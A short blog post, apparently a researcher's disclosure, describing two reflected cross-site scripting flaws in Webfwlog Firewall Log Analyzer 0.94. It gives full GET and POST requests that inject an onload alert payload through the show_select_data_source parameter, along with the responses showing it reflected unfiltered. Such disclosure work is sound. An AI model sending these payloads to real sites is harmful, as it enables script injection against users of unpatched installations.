Last days I found 2 XSS in Webfwlog Firewall Log Analyzer.
1. XSS is here:
---<request>---
GET /cms2/webfwlog-0.94/webfwlog/index.php?show_select_data_source="%3e%3cbody%2fonload%3dalert(3)%3e&restore=yes HTTP/1.1
Host: 10.149.14.58
(...)
Connection: close
---<request>---
Response should look like this:
---<response>---
<td align=left colspan="4">
<input type="hidden" name="show_select_data_source" value=""><body/onload=alert(3)>">
<input type="submit" name="action" value="Select Data Source">
---<response>---
2nd XSS is here:
---<request>---
POST /cms2/webfwlog-0.94/webfwlog/index.php HTTP/1.1
Host: 10.149.14.58
(...)
Content-Length: 173
page=home&report_order=Last+Accessed&show_select_data_source="%3e%3cbody%2fonload%3dalert(3)%3e&action=Select+Data+Source&ulog_table=&data_source=syslog&syslog_file=messages
---<request>---
And response for this one:
---<response>---
<td align=left colspan="4">
<input type="hidden" name="show_select_data_source" value=""><body/onload=alert(3)>">
<input type="submit" name="action" value="Select Data Source">
---<response>---
So as we can see this is the same parameter use (but not filtered) in two places.
Anyway, cool code! ;)
No comments:
Post a Comment
What do You think...?